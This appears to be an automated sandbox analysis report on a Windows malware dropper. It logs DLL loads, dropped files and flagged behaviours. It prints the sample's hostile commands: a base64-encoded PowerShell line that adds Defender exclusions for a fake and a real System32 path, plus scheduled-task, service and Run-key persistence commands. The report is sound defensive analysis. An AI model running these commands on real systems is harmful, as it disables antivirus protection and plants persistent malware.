    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
    Source: C:\Windows\System32\bav64.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
    Source: dYUteuvmHn.exeStatic PE information: Image base 0x140000000 > 0x60000000
    Source: dYUteuvmHn.exeStatic file information: File size 1694720 > 1048576
    Source: dYUteuvmHn.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x16c200
    Source: dYUteuvmHn.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
    Source: dYUteuvmHn.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
    Source: dYUteuvmHn.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
    Source: dYUteuvmHn.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: dYUteuvmHn.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
    Source: dYUteuvmHn.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
    Source: dYUteuvmHn.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: dYUteuvmHn.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: C:\Program Files\vcpkg\buildtrees\curl\x64-windows-rel\lib\libcurl.pdb source: dYUteuvmHn.exe
    Source: Binary string: C:\Program Files\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb## source: dYUteuvmHn.exe
    Source: Binary string: C:\Users\Psiko\software\other\installs bot project\bot_av\build\bot_av.pdb source: bav64.exe, 00000043.00000002.3295608611.00007FF67B99E000.00000002.00000001.01000000.00000018.sdmp
    Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libcrypto-3-x64.pdb source: svchost.exe, 00000037.00000002.3296551400.00007FF8A7B8B000.00000002.00000001.01000000.00000014.sdmp
    Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\Release\libpq\libpq.pdb source: svchost.exe, 00000037.00000002.3297511703.00007FF8B90D8000.00000002.00000001.01000000.00000010.sdmp, libpq.dll.39.dr
    Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\Release\libpq\libpq.pdbJJ source: svchost.exe, 00000037.00000002.3297511703.00007FF8B90D8000.00000002.00000001.01000000.00000010.sdmp, libpq.dll.39.dr
    Source: Binary string: C:\Program Files\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb source: dYUteuvmHn.exe
    Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libssl-3-x64.pdb source: svchost.exe, 00000037.00000002.3297336393.00007FF8B83C0000.00000002.00000001.01000000.00000012.sdmp
    Source: Binary string: PrintUI.pdb source: curlapp64.exe, 00000005.00000003.2494116424.0000022DE271C000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000008.00000003.2588007028.0000021656B8E000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 0000000B.00000003.2664811159.000002552EF01000.00000004.00000020.00020000.00000000.sdmp, printui.exe, 00000023.00000000.2665887118.00007FF7ECF42000.00000002.00000001.01000000.00000008.sdmp, printui.exe, 00000024.00000000.2667340965.00007FF7ECF42000.00000002.00000001.01000000.00000008.sdmp, printui.exe, 00000027.00000002.3135736829.00007FF7ECF42000.00000002.00000001.01000000.00000008.sdmp, printui.exe, 00000027.00000000.2670102378.00007FF7ECF42000.00000002.00000001.01000000.00000008.sdmp
    Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libssl-3-x64.pdb{{ source: svchost.exe, 00000037.00000002.3297336393.00007FF8B83C0000.00000002.00000001.01000000.00000012.sdmp
    Source: Binary string: C:\Users\Psiko\software\other\installs bot project\bot_av\build\bot_av.pdb8 source: bav64.exe, 00000043.00000002.3295608611.00007FF67B99E000.00000002.00000001.01000000.00000018.sdmp
    Source: Binary string: PrintUI.pdbGCTL source: curlapp64.exe, 00000005.00000003.2494116424.0000022DE271C000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000008.00000003.2588007028.0000021656B8E000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 0000000B.00000003.2664811159.000002552EF01000.00000004.00000020.00020000.00000000.sdmp, printui.exe, 00000023.00000000.2665887118.00007FF7ECF42000.00000002.00000001.01000000.00000008.sdmp, printui.exe, 00000024.00000000.2667340965.00007FF7ECF42000.00000002.00000001.01000000.00000008.sdmp, printui.exe, 00000027.00000002.3135736829.00007FF7ECF42000.00000002.00000001.01000000.00000008.sdmp, printui.exe, 00000027.00000000.2670102378.00007FF7ECF42000.00000002.00000001.01000000.00000008.sdmp
    Source: dYUteuvmHn.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
    Source: dYUteuvmHn.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
    Source: dYUteuvmHn.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
    Source: dYUteuvmHn.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
    Source: dYUteuvmHn.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

    Data Obfuscation

    barindex
    Found suspicious powershell code related to unpacking or dynamic code loading
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMz
    Suspicious command line found
    Source: C:\Windows \System32\printui.exeProcess created: cmd.exe /c powershell -Command "$dec = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $dec;"
    Source: C:\Windows \System32\printui.exeProcess created: cmd.exe /c powershell -Command "$dec = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $dec;"Jump to behavior
    Suspicious powershell command line found
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$dec = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $dec;"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$dec = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $dec;"Jump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8A934FE30 WSAStartup,WSACleanup,GetModuleHandleW,GetProcAddress,wcspbrk,LoadLibraryW,GetProcAddress,LoadLibraryExW,GetSystemDirectoryW,malloc,GetSystemDirectoryW,LoadLibraryW,free,GetProcAddress,QueryPerformanceFrequency,5_2_00007FF8A934FE30
    Source: dYUteuvmHn.exeStatic PE information: section name: .fptable
    Source: curlapp64.exe.0.drStatic PE information: section name: .fptable
    Source: libiconv-2.dll.39.drStatic PE information: section name: .xdata
    Source: libiconv-2.dll.39.drStatic PE information: section name: /4
    Source: libiconv-2.dll.39.drStatic PE information: section name: /19
    Source: libiconv-2.dll.39.drStatic PE information: section name: /31
    Source: libiconv-2.dll.39.drStatic PE information: section name: /45
    Source: libiconv-2.dll.39.drStatic PE information: section name: /57
    Source: libiconv-2.dll.39.drStatic PE information: section name: /70
    Source: libiconv-2.dll.39.drStatic PE information: section name: /81
    Source: libiconv-2.dll.39.drStatic PE information: section name: /92
    Source: libintl-9.dll.39.drStatic PE information: section name: .xdata
    Source: libintl-9.dll.39.drStatic PE information: section name: /4
    Source: libintl-9.dll.39.drStatic PE information: section name: /19
    Source: libintl-9.dll.39.drStatic PE information: section name: /31
    Source: libintl-9.dll.39.drStatic PE information: section name: /45
    Source: libintl-9.dll.39.drStatic PE information: section name: /57
    Source: libintl-9.dll.39.drStatic PE information: section name: /70
    Source: libintl-9.dll.39.drStatic PE information: section name: /81
    Source: libintl-9.dll.39.drStatic PE information: section name: /92
    Source: libwinpthread-1.dll.39.drStatic PE information: section name: .xdata
    Source: console_zero.exe.39.drStatic PE information: section name: .fptable
    Source: vcruntime140d.dll.39.drStatic PE information: section name: _RDATA
    Source: bav64.exe.39.drStatic PE information: section name: .textbss
    Source: bav64.exe.39.drStatic PE information: section name: .msvcjmc
    Source: bav64.exe.39.drStatic PE information: section name: .00cfg
    Source: bav64.exe.39.drStatic PE information: section name: .fptable
    Source: svcldr64.dat.39.drStatic PE information: section name: .fptable
    Source: x610437.dat.39.drStatic PE information: section name: .fptable
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8A934CC0C push rdx; ret 5_2_00007FF8A934CC0D
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8A934CC08 push rdi; retn 0004h5_2_00007FF8A934CC09
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 45_2_00007FF8474DD2A5 pushad ; iretd 45_2_00007FF8474DD2A6
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 45_2_00007FF8475F6FDA push edx; iretd 45_2_00007FF8475F6FDB
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 45_2_00007FF8475F2A44 push ebx; iretd 45_2_00007FF8475F2A4A
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 45_2_00007FF8475F88FA push ebx; ret 45_2_00007FF8475F891A
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_649487B2 push r11; ret 55_2_649487ED
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_660224A8 push rax; retf 55_2_660224B1
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_6829984B push 00000000h; retf 55_2_68299850
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_682970AC push rax; iretd 55_2_682970AD
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_682951B2 push rdx; retn 0000h55_2_682951B3
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_6829998B push 00000000h; ret 55_2_68299990
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_6829999B push 00000000h; iretd 55_2_682999A0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_6829AA73 push 00000000h; ret 55_2_6829AA78
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_6829ABBB push 00000000h; retf 55_2_6829ABC0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_6829ABB3 push 00000000h; ret 55_2_6829ABB8
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_6829A7AB push 00000000h; iretd 55_2_6829A7B0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7CEC982 push C90002C4h; ret 55_2_00007FF8A7CEC989
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B834C2B8 push 050001C2h; retn 0001h55_2_00007FF8B834C2C5
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B834C2C8 push 680001C2h; retn 0001h55_2_00007FF8B834C2CD
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B834C2D0 push 680001C2h; retn 0001h55_2_00007FF8B834C2D5

    Persistence and Installation Behavior

    barindex
    Creates a Windows Service pointing to an executable in C:\Windows
    Source: C:\Windows\System32\reg.exeKey value created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\x610437\Parameters ServiceDll C:\Windows\System32\x610437.dat
    Drops executables to the windows directory (C:\Windows) and starts them
    Source: C:\Windows\System32\cmd.exeExecutable created and started: C:\Windows\System32\console_zero.exe
    Source: C:\Windows\System32\cmd.exeExecutable created and started: C:\Windows\System32\bav64.exe
    Source: C:\Windows\System32\cmd.exeExecutable created and started: C:\Windows \System32\printui.exeJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeFile created: C:\Windows \System32\printui.exeJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\x610437.datJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libcurl.dllJump to dropped file
    Source: C:\Users\user\Desktop\dYUteuvmHn.exeFile created: C:\Users\user\Desktop\libcurl.dllJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\svcldr64.datJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\vcruntime140d.dllJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libiconv-2.dllJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libcrypto-3-x64.dllJump to dropped file
    Source: C:\Users\user\Desktop\dYUteuvmHn.exeFile created: C:\Users\user\Desktop\curlapp64.exeJump to dropped file
    Source: C:\Users\user\Desktop\curlapp64.exeFile created: C:\Windows \System32\printui.dll (copy)Jump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\bav64.exeJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libssl-3-x64.dllJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\console_zero.exeJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libwinpthread-1.dllJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libintl-9.dllJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\zlib1.dllJump to dropped file
    Source: C:\Users\user\Desktop\dYUteuvmHn.exeFile created: C:\Users\user\Desktop\zlib1.dllJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\ucrtbased.dllJump to dropped file
    Source: C:\Users\user\Desktop\curlapp64.exeFile created: C:\Users\user\Desktop\prnttemp.dllJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libpq.dllJump to dropped file
    Source: C:\Users\user\Desktop\curlapp64.exeFile created: C:\Windows \System32\printui.exeJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\x610437.datJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libcurl.dllJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\svcldr64.datJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\vcruntime140d.dllJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libiconv-2.dllJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libcrypto-3-x64.dllJump to dropped file
    Source: C:\Users\user\Desktop\curlapp64.exeFile created: C:\Windows \System32\printui.dll (copy)Jump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\bav64.exeJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libssl-3-x64.dllJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\console_zero.exeJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libwinpthread-1.dllJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libintl-9.dllJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\zlib1.dllJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\ucrtbased.dllJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libpq.dllJump to dropped file

    Boot Survival

    barindex
    Uses schtasks.exe or at.exe to add and modify task schedules
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
    Source: C:\Windows\System32\reg.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\x610437\Parameters
    Source: C:\Users\user\Desktop\curlapp64.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run curlapp64Jump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run curlapp64Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create x610437 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto

    Hooking and other Techniques for Hiding and Protection

    barindex
    Loading BitLocker PowerShell Module
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
